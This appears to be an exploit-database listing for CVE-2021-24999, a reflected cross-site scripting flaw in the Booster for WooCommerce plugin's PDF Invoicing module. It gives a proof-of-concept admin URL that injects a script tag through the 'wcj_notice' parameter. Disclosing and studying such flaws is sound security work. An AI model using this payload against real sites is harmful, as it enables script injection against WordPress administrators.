Exploit for Booster for Woocommerce < 5.4.9 - Reflected Cross-Site Scripting in PDF Invoicing Module CVE-2021-24999

Name: Exploit for Booster for Woocommerce < 5.4.9 - Reflected Cross-Site Scripting in PDF Invoicing Module CVE-2021-24999
Rating: 5 (140 reviews)

2021-12-01 | CVSS 2.6

## https://sploitus.com/exploit?id=WPEX-ID:8527F4FE-312F-45C1-AE4C-7E799702FC26
With the PDF Invoicing module active:

https://example.com/wp-admin/edit.php?post_type=shop_order&paged=1&generated=1&generated_type=invoice&generated_invoice=1&post_status=all&wcj_notice=<script>alert(/XSS/)</script>